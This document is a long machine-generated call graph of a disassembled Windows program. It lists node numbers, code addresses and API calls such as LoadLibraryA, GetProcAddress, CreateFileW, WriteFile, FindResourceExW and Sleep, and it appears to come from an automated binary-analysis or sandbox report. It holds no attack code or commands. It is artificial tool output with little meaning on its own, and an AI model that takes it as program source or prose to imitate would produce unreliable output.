101904->101967 103105 569e5d 60 API calls 101904->103105 103106 5b6349 331 API calls 101904->103106 101905 5a4e81 Sleep 101905->101967 101907 5a5c58 TranslateMessage DispatchMessageW GetMessageW 101906->101907 101907->101907 101909 5a5c88 101907->101909 101909->101894 101910 5a4d50 TranslateAcceleratorW 101912 570e43 PeekMessageW 101910->101912 101910->101967 101911 570ea5 TranslateMessage DispatchMessageW 101911->101912 101912->101967 101913 5a581f WaitForSingleObject 101916 5a583c GetExitCodeProcess CloseHandle 101913->101916 101913->101967 101915 570d13 timeGetTime 101915->101967 101952 570f95 101916->101952 101917 570e5f Sleep 101950 570e70 Mailbox 101917->101950 101918 568047 59 API calls 101918->101967 101919 567667 59 API calls 101919->101950 101920 5a5af8 Sleep 101920->101950 101922 580db6 59 API calls Mailbox 101922->101967 101924 58049f timeGetTime 101924->101950 101925 570f4e timeGetTime 103103 569e5d 60 API calls 101925->103103 101928 5a5b8f GetExitCodeProcess 101931 5a5bbb CloseHandle 101928->101931 101932 5a5ba5 WaitForSingleObject 101928->101932 101929 569837 84 API calls 101929->101967 101930 56b7dd 109 API calls 101930->101950 101931->101950 101932->101931 101932->101967 101935 5e5f25 110 API calls 101935->101950 101936 5a5874 101936->101952 101937 569e5d 60 API calls 101937->101967 101938 5a5078 Sleep 101938->101967 101939 5a5c17 Sleep 101939->101967 101941 567de1 59 API calls 101941->101950 101950->101919 101950->101924 101950->101928 101950->101930 101950->101935 101950->101936 101950->101938 101950->101939 101950->101941 101950->101952 101950->101967 103113 5c2408 60 API calls 101950->103113 103114 569e5d 60 API calls 101950->103114 103115 5689b3 69 API calls Mailbox 101950->103115 103116 56b73c 331 API calls 101950->103116 103117 5b64da 60 API calls 101950->103117 103118 5c5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101950->103118 103119 5c3c55 66 API calls Mailbox 101950->103119 101951 567de1 59 API calls 101951->101967 101952->101752 101953 5c9e4a 89 API calls 101953->101967 101955 5684c0 69 API calls 101955->101967 101956 569c90 59 API calls Mailbox 101956->101967 101957 569ea0 304 API calls 101957->101967 101958 56b73c 304 API calls 101958->101967 101960 5b617e 59 API calls Mailbox 101960->101967 101961 5689b3 69 API calls 101961->101967 101962 5a55d5 VariantClear 101962->101967 101963 5a566b VariantClear 101963->101967 101964 568cd4 59 API calls Mailbox 101964->101967 101965 5a5419 VariantClear 101965->101967 101966 5b6e8f 59 API calls 101966->101967 101967->101898 101967->101903 101967->101905 101967->101910 101967->101911 101967->101912 101967->101913 101967->101915 101967->101917 101967->101918 101967->101920 101967->101922 101967->101925 101967->101929 101967->101937 101967->101950 101967->101951 101967->101952 101967->101953 101967->101955 101967->101956 101967->101957 101967->101958 101967->101960 101967->101961 101967->101962 101967->101963 101967->101964 101967->101965 101967->101966 102969 56e6a0 101967->102969 103000 56f460 101967->103000 103019 56fce0 101967->103019 103099 56e420 331 API calls 101967->103099 103100 5631ce IsDialogMessageW GetClassLongW 101967->103100 103107 5e6018 59 API calls 101967->103107 103108 5c9a15 59 API calls Mailbox 101967->103108 103109 5bd4f2 59 API calls 101967->103109 103110 5b60ef 59 API calls 2 library calls 101967->103110 103111 568401 59 API calls 101967->103111 103112 5682df 59 API calls Mailbox 101967->103112 101968->101754 101969->101731 101970->101742 101972 563d3e __ftell_nolock 101971->101972 101973 567bcc 59 API calls 101972->101973 101979 563ea4 Mailbox 101972->101979 101975 563d70 101973->101975 101982 563da6 Mailbox 101975->101982 102082 5679f2 101975->102082 101976 5679f2 59 API calls 101976->101982 101977 563e77 101978 567de1 59 API calls 101977->101978 101977->101979 101981 563e98 101978->101981 101979->101774 101980 567de1 59 API calls 101980->101982 101983 563f74 59 API calls 101981->101983 101982->101976 101982->101977 101982->101979 101982->101980 101984 563f74 59 API calls 101982->101984 101983->101979 101984->101982 102085 564bb5 101985->102085 101990 564e08 LoadLibraryExW 102095 564b6a 101990->102095 101991 59d8e6 101992 564e4a 84 API calls 101991->101992 101994 59d8ed 101992->101994 101996 564b6a 3 API calls 101994->101996 101998 59d8f5 101996->101998 102121 564f0b 101998->102121 101999 564e2f 101999->101998 102000 564e3b 101999->102000 102001 564e4a 84 API calls 102000->102001 102003 5637d4 102001->102003 102003->101781 102003->101782 102006 59d91c 102129 564ec7 102006->102129 102008 59d929 102010 580db6 Mailbox 59 API calls 102009->102010 102011 5637fb 102010->102011 102011->101795 102013 5684cb 102012->102013 102015 5684f2 102013->102015 102380 5689b3 69 API calls Mailbox 102013->102380 102015->101799 102017 563ef3 102016->102017 102018 563eda 102016->102018 102020 567bcc 59 API calls 102017->102020 102019 568047 59 API calls 102018->102019 102021 563879 102019->102021 102020->102021 102022 582efd 102021->102022 102023 582f09 102022->102023 102024 582f7e 102022->102024 102031 582f2e 102023->102031 102381 588b28 58 API calls __getptd_noexit 102023->102381 102383 582f90 60 API calls 3 library calls 102024->102383 102027 582f8b 102027->101820 102028 582f15 102382 588db6 9 API calls __filbuf 102028->102382 102030 582f20 102030->101820 102031->101820 102033 59f17c 102032->102033 102035 568ef7 102032->102035 102033->102035 102385 568bdb 59 API calls Mailbox 102033->102385 102036 569040 102035->102036 102037 568ff8 102035->102037 102040 568fff 102035->102040 102384 569d3c 60 API calls Mailbox 102036->102384 102039 580db6 Mailbox 59 API calls 102037->102039 102039->102040 102040->101848 102042 564ee5 85 API calls 102041->102042 102043 5c95ca 102042->102043 102386 5c9734 102043->102386 102046 564f0b 74 API calls 102047 5c95f7 102046->102047 102048 564f0b 74 API calls 102047->102048 102049 5c9607 102048->102049 102050 564f0b 74 API calls 102049->102050 102051 5c9622 102050->102051 102052 564f0b 74 API calls 102051->102052 102053 5c963d 102052->102053 102054 564ee5 85 API calls 102053->102054 102055 5c9654 102054->102055 102056 58571c _W_store_winword 58 API calls 102055->102056 102057 5c965b 102056->102057 102058 58571c _W_store_winword 58 API calls 102057->102058 102059 5c9665 102058->102059 102060 564f0b 74 API calls 102059->102060 102061 5c9679 102060->102061 102062 5c9109 GetSystemTimeAsFileTime 102061->102062 102063 5c968c 102062->102063 102064 5c96b6 102063->102064 102065 5c96a1 102063->102065 102067 5c96bc 102064->102067 102068 5c971b 102064->102068 102066 582d55 _free 58 API calls 102065->102066 102070 5c96a7 102066->102070 102392 5c8b06 102067->102392 102069 582d55 _free 58 API calls 102068->102069 102074 59d186 102069->102074 102072 582d55 _free 58 API calls 102070->102072 102072->102074 102074->101785 102076 564e4a 102074->102076 102075 582d55 _free 58 API calls 102075->102074 102077 564e54 102076->102077 102078 564e5b 102076->102078 102079 5853a6 __fcloseall 83 API calls 102077->102079 102080 564e6a 102078->102080 102081 564e7b FreeLibrary 102078->102081 102079->102078 102080->101785 102081->102080 102083 567e4f 59 API calls 102082->102083 102084 5679fd 102083->102084 102084->101975 102134 564c03 102085->102134 102088 564bdc 102089 564bf5 102088->102089 102090 564bec FreeLibrary 102088->102090 102092 58525b 102089->102092 102090->102089 102091 564c03 2 API calls 102091->102088 102138 585270 102092->102138 102094 564dfc 102094->101990 102094->101991 102298 564c36 102095->102298 102098 564ba1 FreeLibrary 102099 564baa 102098->102099 102102 564c70 102099->102102 102100 564c36 2 API calls 102101 564b8f 102100->102101 102101->102098 102101->102099 102103 580db6 Mailbox 59 API calls 102102->102103 102104 564c85 102103->102104 102105 56522e 59 API calls 102104->102105 102106 564c91 _memmove 102105->102106 102107 564ccc 102106->102107 102109 564dc1 102106->102109 102110 564d89 102106->102110 102108 564ec7 69 API calls 102107->102108 102118 564cd5 102108->102118 102313 5c991b 95 API calls 102109->102313 102302 564e89 CreateStreamOnHGlobal 102110->102302 102113 564f0b 74 API calls 102113->102118 102115 564d69 102115->101999 102116 59d8a7 102117 564ee5 85 API calls 102116->102117 102119 59d8bb 102117->102119 102118->102113 102118->102115 102118->102116 102308 564ee5 102118->102308 102120 564f0b 74 API calls 102119->102120 102120->102115 102122 59d9cd 102121->102122 102123 564f1d 102121->102123 102337 5855e2 102123->102337 102126 5c9109 102357 5c8f5f 102126->102357 102128 5c911f 102128->102006 102130 564ed6 102129->102130 102133 59d990 102129->102133 102362 585c60 102130->102362 102132 564ede 102132->102008 102135 564bd0 102134->102135 102136 564c0c LoadLibraryA 102134->102136 102135->102088 102135->102091 102136->102135 102137 564c1d GetProcAddress 102136->102137 102137->102135 102141 58527c _fprintf 102138->102141 102139 58528f 102187 588b28 58 API calls __getptd_noexit 102139->102187 102141->102139 102143 5852c0 102141->102143 102142 585294 102188 588db6 9 API calls __filbuf 102142->102188 102157 5904e8 102143->102157 102146 5852c5 102147 5852db 102146->102147 102148 5852ce 102146->102148 102150 585305 102147->102150 102151 5852e5 102147->102151 102189 588b28 58 API calls __getptd_noexit 102148->102189 102172 590607 102150->102172 102190 588b28 58 API calls __getptd_noexit 102151->102190 102154 58529f @_EH4_CallFilterFunc@8 _fprintf 102154->102094 102158 5904f4 _fprintf 102157->102158 102159 589c0b __lock 58 API calls 102158->102159 102165 590502 102159->102165 102160 59057d 102197 58881d 58 API calls 2 library calls 102160->102197 102163 590584 102170 590576 102163->102170 102198 589e2b InitializeCriticalSectionAndSpinCount 102163->102198 102164 5905f3 _fprintf 102164->102146 102165->102160 102167 589c93 __mtinitlocknum 58 API calls 102165->102167 102165->102170 102195 586c50 59 API calls __lock 102165->102195 102196 586cba LeaveCriticalSection LeaveCriticalSection _doexit 102165->102196 102167->102165 102169 5905aa EnterCriticalSection 102169->102170 102192 5905fe 102170->102192 102181 590627 __wopenfile 102172->102181 102173 590641 102203 588b28 58 API calls __getptd_noexit 102173->102203 102174 5907fc 102174->102173 102178 59085f 102174->102178 102176 590646 102204 588db6 9 API calls __filbuf 102176->102204 102200 5985a1 102178->102200 102179 585310 102191 585332 LeaveCriticalSection LeaveCriticalSection _fseek 102179->102191 102181->102173 102181->102174 102205 5837cb 60 API calls 2 library calls 102181->102205 102183 5907f5 102183->102174 102206 5837cb 60 API calls 2 library calls 102183->102206 102185 590814 102185->102174 102207 5837cb 60 API calls 2 library calls 102185->102207 102187->102142 102188->102154 102189->102154 102190->102154 102191->102154 102199 589d75 LeaveCriticalSection 102192->102199 102194 590605 102194->102164 102195->102165 102196->102165 102197->102163 102198->102169 102199->102194 102208 597d85 102200->102208 102202 5985ba 102202->102179 102203->102176 102204->102179 102205->102183 102206->102185 102207->102174 102210 597d91 _fprintf 102208->102210 102209 597da7 102295 588b28 58 API calls __getptd_noexit 102209->102295 102210->102209 102212 597ddd 102210->102212 102219 597e4e 102212->102219 102213 597dac 102296 588db6 9 API calls __filbuf 102213->102296 102216 597df9 102297 597e22 LeaveCriticalSection __unlock_fhandle 102216->102297 102218 597db6 _fprintf 102218->102202 102220 597e6e 102219->102220 102221 5844ea __wsopen_nolock 58 API calls 102220->102221 102224 597e8a 102221->102224 102222 588dc6 __invoke_watson 8 API calls 102223 5985a0 102222->102223 102226 597d85 __wsopen_helper 103 API calls 102223->102226 102225 597ec4 102224->102225 102231 597ee7 102224->102231 102242 597fc1 102224->102242 102227 588af4 __dosmaperr 58 API calls 102225->102227 102228 5985ba 102226->102228 102229 597ec9 102227->102229 102228->102216 102230 588b28 __filbuf 58 API calls 102229->102230 102232 597ed6 102230->102232 102233 597fa5 102231->102233 102240 597f83 102231->102240 102234 588db6 __filbuf 9 API calls 102232->102234 102235 588af4 __dosmaperr 58 API calls 102233->102235 102236 597ee0 102234->102236 102237 597faa 102235->102237 102236->102216 102238 588b28 __filbuf 58 API calls 102237->102238 102239 597fb7 102238->102239 102241 588db6 __filbuf 9 API calls 102239->102241 102243 58d294 __alloc_osfhnd 61 API calls 102240->102243 102241->102242 102242->102222 102244 598051 102243->102244 102245 59805b 102244->102245 102246 59807e 102244->102246 102247 588af4 __dosmaperr 58 API calls 102245->102247 102248 597cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102246->102248 102249 598060 102247->102249 102256 5980a0 102248->102256 102250 588b28 __filbuf 58 API calls 102249->102250 102252 59806a 102250->102252 102251 59811e GetFileType 102253 598129 GetLastError 102251->102253 102254 59816b 102251->102254 102258 588b28 __filbuf 58 API calls 102252->102258 102259 588b07 __dosmaperr 58 API calls 102253->102259 102264 58d52a __set_osfhnd 59 API calls 102254->102264 102255 5980ec GetLastError 102257 588b07 __dosmaperr 58 API calls 102255->102257 102256->102251 102256->102255 102260 597cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102256->102260 102261 598111 102257->102261 102258->102236 102262 598150 CloseHandle 102259->102262 102263 5980e1 102260->102263 102266 588b28 __filbuf 58 API calls 102261->102266 102262->102261 102265 59815e 102262->102265 102263->102251 102263->102255 102270 598189 102264->102270 102267 588b28 __filbuf 58 API calls 102265->102267 102266->102242 102268 598163 102267->102268 102268->102261 102269 598344 102269->102242 102272 598517 CloseHandle 102269->102272 102270->102269 102271 5918c1 __lseeki64_nolock 60 API calls 102270->102271 102286 59820a 102270->102286 102273 5981f3 102271->102273 102274 597cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102272->102274 102277 588af4 __dosmaperr 58 API calls 102273->102277 102292 598212 102273->102292 102276 59853e 102274->102276 102275 590e5b 70 API calls __read_nolock 102275->102292 102278 5983ce 102276->102278 102279 598546 GetLastError 102276->102279 102277->102286 102278->102242 102280 588b07 __dosmaperr 58 API calls 102279->102280 102282 598552 102280->102282 102281 590add __close_nolock 61 API calls 102281->102292 102284 58d43d __free_osfhnd 59 API calls 102282->102284 102283 5997a2 __chsize_nolock 82 API calls 102283->102292 102284->102278 102285 58d886 __write 78 API calls 102285->102286 102286->102269 102286->102285 102288 5918c1 60 API calls __lseeki64_nolock 102286->102288 102286->102292 102287 5983c1 102290 590add __close_nolock 61 API calls 102287->102290 102288->102286 102289 5983aa 102289->102269 102291 5983c8 102290->102291 102293 588b28 __filbuf 58 API calls 102291->102293 102292->102275 102292->102281 102292->102283 102292->102286 102292->102287 102292->102289 102294 5918c1 60 API calls __lseeki64_nolock 102292->102294 102293->102278 102294->102292 102295->102213 102296->102218 102297->102218 102299 564b83 102298->102299 102300 564c3f LoadLibraryA 102298->102300 102299->102100 102299->102101 102300->102299 102301 564c50 GetProcAddress 102300->102301 102301->102299 102303 564ea3 FindResourceExW 102302->102303 102304 564ec0 102302->102304 102303->102304 102305 59d933 LoadResource 102303->102305 102304->102107 102305->102304 102306 59d948 SizeofResource 102305->102306 102306->102304 102307 59d95c LockResource 102306->102307 102307->102304 102309 59d9ab 102308->102309 102310 564ef4 102308->102310 102314 58584d 102310->102314 102312 564f02 102312->102118 102313->102107 102317 585859 _fprintf 102314->102317 102315 58586b 102327 588b28 58 API calls __getptd_noexit 102315->102327 102316 585891 102329 586c11 102316->102329 102317->102315 102317->102316 102320 585870 102328 588db6 9 API calls __filbuf 102320->102328 102321 585897 102335 5857be 83 API calls 4 library calls 102321->102335 102323 58587b _fprintf 102323->102312 102325 5858a6 102336 5858c8 LeaveCriticalSection LeaveCriticalSection _fseek 102325->102336 102327->102320 102328->102323 102330 586c21 102329->102330 102331 586c43 EnterCriticalSection 102329->102331 102330->102331 102332 586c29 102330->102332 102334 586c39 102331->102334 102333 589c0b __lock 58 API calls 102332->102333 102333->102334 102334->102321 102335->102325 102336->102323 102340 5855fd 102337->102340 102339 564f2e 102339->102126 102341 585609 _fprintf 102340->102341 102342 58564c 102341->102342 102343 58561f _memset 102341->102343 102344 585644 _fprintf 102341->102344 102345 586c11 __lock_file 59 API calls 102342->102345 102353 588b28 58 API calls __getptd_noexit 102343->102353 102344->102339 102346 585652 102345->102346 102355 58541d 72 API calls 4 library calls 102346->102355 102349 585639 102354 588db6 9 API calls __filbuf 102349->102354 102350 585668 102356 585686 LeaveCriticalSection LeaveCriticalSection _fseek 102350->102356 102353->102349 102354->102344 102355->102350 102356->102344 102360 58520a GetSystemTimeAsFileTime 102357->102360 102359 5c8f6e 102359->102128 102361 585238 __aulldiv 102360->102361 102361->102359 102363 585c6c _fprintf 102362->102363 102364 585c7e 102363->102364 102365 585c93 102363->102365 102376 588b28 58 API calls __getptd_noexit 102364->102376 102367 586c11 __lock_file 59 API calls 102365->102367 102369 585c99 102367->102369 102368 585c83 102377 588db6 9 API calls __filbuf 102368->102377 102378 5858d0 67 API calls 5 library calls 102369->102378 102372 585ca4 102379 585cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102372->102379 102374 585cb6 102375 585c8e _fprintf 102374->102375 102375->102132 102376->102368 102377->102375 102378->102372 102379->102374 102380->102015 102381->102028 102382->102030 102383->102027 102384->102040 102385->102035 102388 5c9748 __tzset_nolock _wcscmp 102386->102388 102387 564f0b 74 API calls 102387->102388 102388->102387 102389 5c9109 GetSystemTimeAsFileTime 102388->102389 102390 5c95dc 102388->102390 102391 564ee5 85 API calls 102388->102391 102389->102388 102390->102046 102390->102074 102391->102388 102393 5c8b1f 102392->102393 102394 5c8b11 102392->102394 102396 5c8b64 102393->102396 102397 58525b 115 API calls 102393->102397 102422 5c8b28 102393->102422 102395 58525b 115 API calls 102394->102395 102395->102393 102423 5c8d91 74 API calls 3 library calls 102396->102423 102399 5c8b49 102397->102399 102399->102396 102400 5c8b52 102399->102400 102400->102422 102434 5853a6 102400->102434 102401 5c8ba8 102402 5c8bcd 102401->102402 102406 5c8bac 102401->102406 102424 5c89a9 58 API calls _W_store_winword 102402->102424 102405 5c8bb9 102411 5853a6 __fcloseall 83 API calls 102405->102411 102405->102422 102406->102405 102408 5853a6 __fcloseall 83 API calls 102406->102408 102407 5c8bd5 102409 5c8bfb 102407->102409 102410 5c8bdb 102407->102410 102408->102405 102425 5c8c2b 90 API calls 102409->102425 102412 5c8be8 102410->102412 102415 5853a6 __fcloseall 83 API calls 102410->102415 102411->102422 102417 5853a6 __fcloseall 83 API calls 102412->102417 102412->102422 102414 5c8c02 102426 5c8d0d 102414->102426 102415->102412 102417->102422 102419 5c8c16 102421 5853a6 __fcloseall 83 API calls 102419->102421 102419->102422 102420 5853a6 __fcloseall 83 API calls 102420->102419 102421->102422 102422->102075 102423->102401 102424->102407 102425->102414 102427 5c8d1a 102426->102427 102428 5c8d20 102426->102428 102429 582d55 _free 58 API calls 102427->102429 102430 582d55 _free 58 API calls 102428->102430 102431 5c8d31 102428->102431 102429->102428 102430->102431 102432 5c8c09 102431->102432 102433 582d55 _free 58 API calls 102431->102433 102432->102419 102432->102420 102433->102432 102435 5853b2 _fprintf 102434->102435 102436 5853de 102435->102436 102437 5853c6 102435->102437 102439 586c11 __lock_file 59 API calls 102436->102439 102443 5853d6 _fprintf 102436->102443 102463 588b28 58 API calls __getptd_noexit 102437->102463 102442 5853f0 102439->102442 102440 5853cb 102464 588db6 9 API calls __filbuf 102440->102464 102447 58533a 102442->102447 102443->102422 102448 585349 102447->102448 102449 58535d 102447->102449 102509 588b28 58 API calls __getptd_noexit 102448->102509 102451 585359 102449->102451 102466 584a3d 102449->102466 102465 585415 LeaveCriticalSection LeaveCriticalSection _fseek 102451->102465 102452 58534e 102510 588db6 9 API calls __filbuf 102452->102510 102459 585377 102483 590a02 102459->102483 102461 58537d 102461->102451 102462 582d55 _free 58 API calls 102461->102462 102462->102451 102463->102440 102464->102443 102465->102443 102467 584a50 102466->102467 102471 584a74 102466->102471 102468 5846e6 __filbuf 58 API calls 102467->102468 102467->102471 102469 584a6d 102468->102469 102511 58d886 102469->102511 102472 590b77 102471->102472 102473 590b84 102472->102473 102475 585371 102472->102475 102474 582d55 _free 58 API calls 102473->102474 102473->102475 102474->102475 102476 5846e6 102475->102476 102477 5846f0 102476->102477 102478 584705 102476->102478 102621 588b28 58 API calls __getptd_noexit 102477->102621 102478->102459 102480 5846f5 102622 588db6 9 API calls __filbuf 102480->102622 102482 584700 102482->102459 102484 590a0e _fprintf 102483->102484 102485 590a1b 102484->102485 102486 590a32 102484->102486 102638 588af4 58 API calls __getptd_noexit 102485->102638 102488 590abd 102486->102488 102490 590a42 102486->102490 102643 588af4 58 API calls __getptd_noexit 102488->102643 102489 590a20 102639 588b28 58 API calls __getptd_noexit 102489->102639 102493 590a6a 102490->102493 102494 590a60 102490->102494 102496 58d206 ___lock_fhandle 59 API calls 102493->102496 102640 588af4 58 API calls __getptd_noexit 102494->102640 102495 590a65 102644 588b28 58 API calls __getptd_noexit 102495->102644 102498 590a70 102496->102498 102501 590a8e 102498->102501 102502 590a83 102498->102502 102500 590ac9 102645 588db6 9 API calls __filbuf 102500->102645 102641 588b28 58 API calls __getptd_noexit 102501->102641 102623 590add 102502->102623 102505 590a27 _fprintf 102505->102461 102507 590a89 102642 590ab5 LeaveCriticalSection __unlock_fhandle 102507->102642 102509->102452 102510->102451 102512 58d892 _fprintf 102511->102512 102513 58d89f 102512->102513 102514 58d8b6 102512->102514 102612 588af4 58 API calls __getptd_noexit 102513->102612 102515 58d955 102514->102515 102517 58d8ca 102514->102517 102618 588af4 58 API calls __getptd_noexit 102515->102618 102520 58d8e8 102517->102520 102521 58d8f2 102517->102521 102519 58d8a4 102613 588b28 58 API calls __getptd_noexit 102519->102613 102614 588af4 58 API calls __getptd_noexit 102520->102614 102539 58d206 102521->102539 102522 58d8ed 102619 588b28 58 API calls __getptd_noexit 102522->102619 102526 58d8f8 102528 58d90b 102526->102528 102529 58d91e 102526->102529 102548 58d975 102528->102548 102615 588b28 58 API calls __getptd_noexit 102529->102615 102530 58d961 102620 588db6 9 API calls __filbuf 102530->102620 102534 58d8ab _fprintf 102534->102471 102535 58d917 102617 58d94d LeaveCriticalSection __unlock_fhandle 102535->102617 102536 58d923 102616 588af4 58 API calls __getptd_noexit 102536->102616 102540 58d212 _fprintf 102539->102540 102541 58d261 EnterCriticalSection 102540->102541 102543 589c0b __lock 58 API calls 102540->102543 102542 58d287 _fprintf 102541->102542 102542->102526 102544 58d237 102543->102544 102545 58d24f 102544->102545 102546 589e2b __ioinit InitializeCriticalSectionAndSpinCount 102544->102546 102547 58d28b ___lock_fhandle LeaveCriticalSection 102545->102547 102546->102545 102547->102541 102549 58d982 __ftell_nolock 102548->102549 102550 58d9e0 102549->102550 102551 58d9c1 102549->102551 102595 58d9b6 102549->102595 102555 58da38 102550->102555 102556 58da1c 102550->102556 102553 588af4 __dosmaperr 58 API calls 102551->102553 102552 58c5f6 __cftoe2_l 6 API calls 102557 58e1d6 102552->102557 102554 58d9c6 102553->102554 102558 588b28 __filbuf 58 API calls 102554->102558 102559 58da51 102555->102559 102562 5918c1 __lseeki64_nolock 60 API calls 102555->102562 102560 588af4 __dosmaperr 58 API calls 102556->102560 102557->102535 102561 58d9cd 102558->102561 102563 595c6b __flswbuf 58 API calls 102559->102563 102564 58da21 102560->102564 102565 588db6 __filbuf 9 API calls 102561->102565 102562->102559 102566 58da5f 102563->102566 102567 588b28 __filbuf 58 API calls 102564->102567 102565->102595 102568 58ddb8 102566->102568 102573 5899ac __beginthreadex 58 API calls 102566->102573 102569 58da28 102567->102569 102570 58e14b WriteFile 102568->102570 102571 58ddd6 102568->102571 102572 588db6 __filbuf 9 API calls 102569->102572 102574 58ddab GetLastError 102570->102574 102605 58dd78 102570->102605 102575 58defa 102571->102575 102578 58ddec 102571->102578 102572->102595 102576 58da8b GetConsoleMode 102573->102576 102574->102605 102591 58dfef 102575->102591 102593 58df05 102575->102593 102576->102568 102577 58daca 102576->102577 102577->102568 102580 58dada GetConsoleCP 102577->102580 102581 58de5b WriteFile 102578->102581 102585 58e184 102578->102585 102579 588b28 __filbuf 58 API calls 102583 58e1b2 102579->102583 102580->102585 102610 58db09 102580->102610 102581->102574 102582 58de98 102581->102582 102582->102578 102587 58debc 102582->102587 102588 588af4 __dosmaperr 58 API calls 102583->102588 102584 58ded8 102589 58e17b 102584->102589 102590 58dee3 102584->102590 102585->102579 102585->102595 102586 58df6a WriteFile 102586->102574 102594 58dfb9 102586->102594 102587->102605 102588->102595 102597 588b07 __dosmaperr 58 API calls 102589->102597 102596 588b28 __filbuf 58 API calls 102590->102596 102591->102585 102592 58e064 WideCharToMultiByte 102591->102592 102592->102574 102603 58e0ab 102592->102603 102593->102585 102593->102586 102594->102587 102594->102593 102594->102605 102595->102552 102599 58dee8 102596->102599 102597->102595 102598 58e0b3 WriteFile 102601 58e106 GetLastError 102598->102601 102598->102603 102602 588af4 __dosmaperr 58 API calls 102599->102602 102600 5835f5 __write_nolock 58 API calls 102600->102610 102601->102603 102602->102595 102603->102587 102603->102591 102603->102598 102603->102605 102604 597a5e WriteConsoleW CreateFileW __putwch_nolock 102609 58dc5f 102604->102609 102605->102584 102605->102585 102605->102595 102606 5962ba 60 API calls __write_nolock 102606->102610 102607 58dbf2 WideCharToMultiByte 102607->102605 102608 58dc2d WriteFile 102607->102608 102608->102574 102608->102609 102609->102574 102609->102604 102609->102605 102609->102610 102611 58dc87 WriteFile 102609->102611 102610->102600 102610->102605 102610->102606 102610->102607 102610->102609 102611->102574 102611->102609 102612->102519 102613->102534 102614->102522 102615->102536 102616->102535 102617->102534 102618->102522 102619->102530 102620->102534 102621->102480 102622->102482 102646 58d4c3 102623->102646 102625 590b41 102659 58d43d 59 API calls 2 library calls 102625->102659 102627 590aeb 102627->102625 102629 58d4c3 __lseeki64_nolock 58 API calls 102627->102629 102637 590b1f 102627->102637 102628 590b49 102634 590b6b 102628->102634 102660 588b07 58 API calls 2 library calls 102628->102660 102631 590b16 102629->102631 102630 58d4c3 __lseeki64_nolock 58 API calls 102632 590b2b CloseHandle 102630->102632 102635 58d4c3 __lseeki64_nolock 58 API calls 102631->102635 102632->102625 102636 590b37 GetLastError 102632->102636 102634->102507 102635->102637 102636->102625 102637->102625 102637->102630 102638->102489 102639->102505 102640->102495 102641->102507 102642->102505 102643->102495 102644->102500 102645->102505 102647 58d4ce 102646->102647 102648 58d4e3 102646->102648 102649 588af4 __dosmaperr 58 API calls 102647->102649 102651 588af4 __dosmaperr 58 API calls 102648->102651 102653 58d508 102648->102653 102650 58d4d3 102649->102650 102652 588b28 __filbuf 58 API calls 102650->102652 102654 58d512 102651->102654 102655 58d4db 102652->102655 102653->102627 102656 588b28 __filbuf 58 API calls 102654->102656 102655->102627 102657 58d51a 102656->102657 102658 588db6 __filbuf 9 API calls 102657->102658 102658->102655 102659->102628 102660->102634 102662 591940 __ftell_nolock 102661->102662 102663 58079e GetLongPathNameW 102662->102663 102664 567bcc 59 API calls 102663->102664 102665 5672bd 102664->102665 102666 56700b 102665->102666 102667 567667 59 API calls 102666->102667 102668 56701d 102667->102668 102669 564750 60 API calls 102668->102669 102670 567028 102669->102670 102671 567033 102670->102671 102672 59e885 102670->102672 102674 563f74 59 API calls 102671->102674 102678 59e89f 102672->102678 102719 567908 61 API calls 102672->102719 102675 56703f 102674->102675 102713 5634c2 102675->102713 102677 567052 Mailbox 102677->101864 102680 564ddd 136 API calls 102679->102680 102681 56688f 102680->102681 102682 59e031 102681->102682 102683 564ddd 136 API calls 102681->102683 102684 5c955b 122 API calls 102682->102684 102685 5668a3 102683->102685 102686 59e046 102684->102686 102685->102682 102689 5668ab 102685->102689 102687 59e04a 102686->102687 102688 59e067 102686->102688 102690 564e4a 84 API calls 102687->102690 102691 580db6 Mailbox 59 API calls 102688->102691 102692 5668b7 102689->102692 102693 59e052 102689->102693 102690->102693 102712 59e0ac Mailbox 102691->102712 102720 566a8c 102692->102720 102836 5c42f8 90 API calls _wprintf 102693->102836 102696 59e060 102696->102688 102698 59e260 102699 582d55 _free 58 API calls 102698->102699 102700 59e268 102699->102700 102701 564e4a 84 API calls 102700->102701 102706 59e271 102701->102706 102705 582d55 _free 58 API calls 102705->102706 102706->102705 102708 564e4a 84 API calls 102706->102708 102838 5bf7a1 89 API calls 4 library calls 102706->102838 102708->102706 102709 567de1 59 API calls 102709->102712 102712->102698 102712->102706 102712->102709 102813 5bf73d 102712->102813 102816 5c737f 102712->102816 102822 56750f 102712->102822 102830 56735d 102712->102830 102837 5bf65e 61 API calls 2 library calls 102712->102837 102714 5634d4 102713->102714 102718 5634f3 _memmove 102713->102718 102716 580db6 Mailbox 59 API calls 102714->102716 102715 580db6 Mailbox 59 API calls 102717 56350a 102715->102717 102716->102718 102717->102677 102718->102715 102719->102672 102721 566ab5 102720->102721 102722 59e41e 102720->102722 102844 5657a6 60 API calls Mailbox 102721->102844 102911 5bf7a1 89 API calls 4 library calls 102722->102911 102725 59e431 102912 5bf7a1 89 API calls 4 library calls 102725->102912 102726 566ad7 102845 5657f6 67 API calls 102726->102845 102728 566aec 102728->102725 102729 566af4 102728->102729 102731 567667 59 API calls 102729->102731 102733 566b00 102731->102733 102732 59e44d 102735 566b61 102732->102735 102846 580957 60 API calls __ftell_nolock 102733->102846 102737 566b6f 102735->102737 102738 59e460 102735->102738 102736 566b0c 102739 567667 59 API calls 102736->102739 102741 567667 59 API calls 102737->102741 102740 565c6f CloseHandle 102738->102740 102743 566b18 102739->102743 102744 59e46c 102740->102744 102742 566b78 102741->102742 102745 567667 59 API calls 102742->102745 102746 564750 60 API calls 102743->102746 102747 564ddd 136 API calls 102744->102747 102748 566b81 102745->102748 102749 566b26 102746->102749 102750 59e488 102747->102750 102849 56459b 102748->102849 102847 565850 ReadFile SetFilePointerEx 102749->102847 102751 59e4b1 102750->102751 102754 5c955b 122 API calls 102750->102754 102913 5bf7a1 89 API calls 4 library calls 102751->102913 102758 59e4a4 102754->102758 102755 566b98 102759 567b2e 59 API calls 102755->102759 102757 566b52 102848 565aee SetFilePointerEx SetFilePointerEx 102757->102848 102762 59e4cd 102758->102762 102763 59e4ac 102758->102763 102764 566ba9 SetCurrentDirectoryW 102759->102764 102760 59e4c8 102768 566d0c Mailbox 102760->102768 102766 564e4a 84 API calls 102762->102766 102765 564e4a 84 API calls 102763->102765 102770 566bbc Mailbox 102764->102770 102765->102751 102767 59e4d2 102766->102767 102769 580db6 Mailbox 59 API calls 